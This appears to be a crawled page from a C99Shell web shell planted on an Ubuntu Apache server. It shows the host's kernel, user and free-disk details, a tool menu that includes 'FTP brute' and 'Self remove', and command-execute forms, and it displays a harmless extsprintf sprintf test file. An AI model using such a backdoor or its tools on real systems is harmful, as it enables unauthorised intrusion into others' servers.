!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/wincloud_gateway/node_modules/extsprintf/test/   drwxr-xr-x
Free 12.91 GB of 57.97 GB (22.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     tst.basic.js (2.79 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * tst.basic.js: tests various valid invocation
 */

var mod_assert = require('assert');
var mod_extsprintf = require('../lib/extsprintf');
var mod_path = require('path');
var sprintf = mod_extsprintf.sprintf;

var testcases = [ {
    'name': 'empty string',
    'args': [ '' ],
    'result': ''
}, {
    'name': '%s: basic',
    'args': [ '%s', 'foo' ],
    'result': 'foo'
}, {
    'name': '%s: not first',
    'args': [ 'hello %s\n', 'world' ],
    'result': 'hello world\n'
}, {
    'name': '%s: right-aligned',
    'args': [ 'hello %10s\n', 'world' ],
    'result': 'hello      world\n'
}, {
    'name': '%s: left-aligned',
    'args': [ 'hello %-10sagain\n', 'world' ],
    'result': 'hello world     again\n'
}, {
    'name': '%d: basic, positive',
    'args': [ '%d', 17 ],
    'result': '17'
}, {
    'name': '%d: basic, zero',
    'args': [ '%d', 0 ],
    'result': '0'
}, {
    'name': '%d: basic, floating point value',
    'args': [ '%d', 17.3 ],
    'result': '17'
}, {
    'name': '%d: basic, negative',
    'args': [ '%d', -3 ],
    'result': '-3'
}, {
    'name': '%d: right-aligned',
    'args': [ '%4d', 17 ],
    'result': '  17'
}, {
    'name': '%d: right-aligned, zero-padded',
    'args': [ '%04d', 17 ],
    'result': '0017'
}, {
    'name': '%d: left-aligned',
    'args': [ '%-4d', 17 ],
    'result': '17  '
}, {
    'name': '%x: basic',
    'args': [ '%x', 18],
    'result': '12'
}, {
    'name': '%x: zero-padded, right-aligned',
    'args': [ '%08x', 0xfeedface ],
    'result': 'feedface'
}, {
    'name': '%d: with plus sign',
    'args': [ '%+d', 17 ],
    'result': '+17'
}, {
    'name': '%f: basic',
    'args': [ '%f', 3.2 ],
    'result': '3.2'
}, {
    'name': '%f: right-aligned',
    'args': [ '%5f', 3.2 ],
    'result': '  3.2'
}, {
    'name': '%%: basic',
    'args': [ '%%' ],
    'result': '%'
}, {
    'name': 'complex',
    'args': [ 'one %s %8s %-3d bytes past 0x%04x, which was %6f%%%s%5s',
        'program', 'wrote', -2, 0x30, 3.7, ' plus', 'over' ],
    'result': 'one program    wrote -2  bytes past 0x0030, which was    ' +
        '3.7% plus over'
} ];

function main(verbose) {
	/*
	 * Create one test case with a very large input string.
	 */
	var input = '1234';
	while (input.length < 100 * 1024) {
		input += input;
	}
	testcases.push({
	    'name': 'long string argument (' + input.length + ' characters)',
	    'args': [ '%s', input ],
	    'result': input
	});

	testcases.forEach(function (tc) {
		var result;
		console.error('test case: %s', tc.name);
		result = sprintf.apply(null, tc.args);
		if (verbose) {
			console.error('    args:   %s', JSON.stringify(tc.args));
			console.error('    result: %s', result);
		}
		mod_assert.equal(tc.result, result);
	});

	console.log('%s tests passed', mod_path.basename(__filename));
}

main(process.argv.length > 2 && process.argv[2] == '-v');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0357 ]--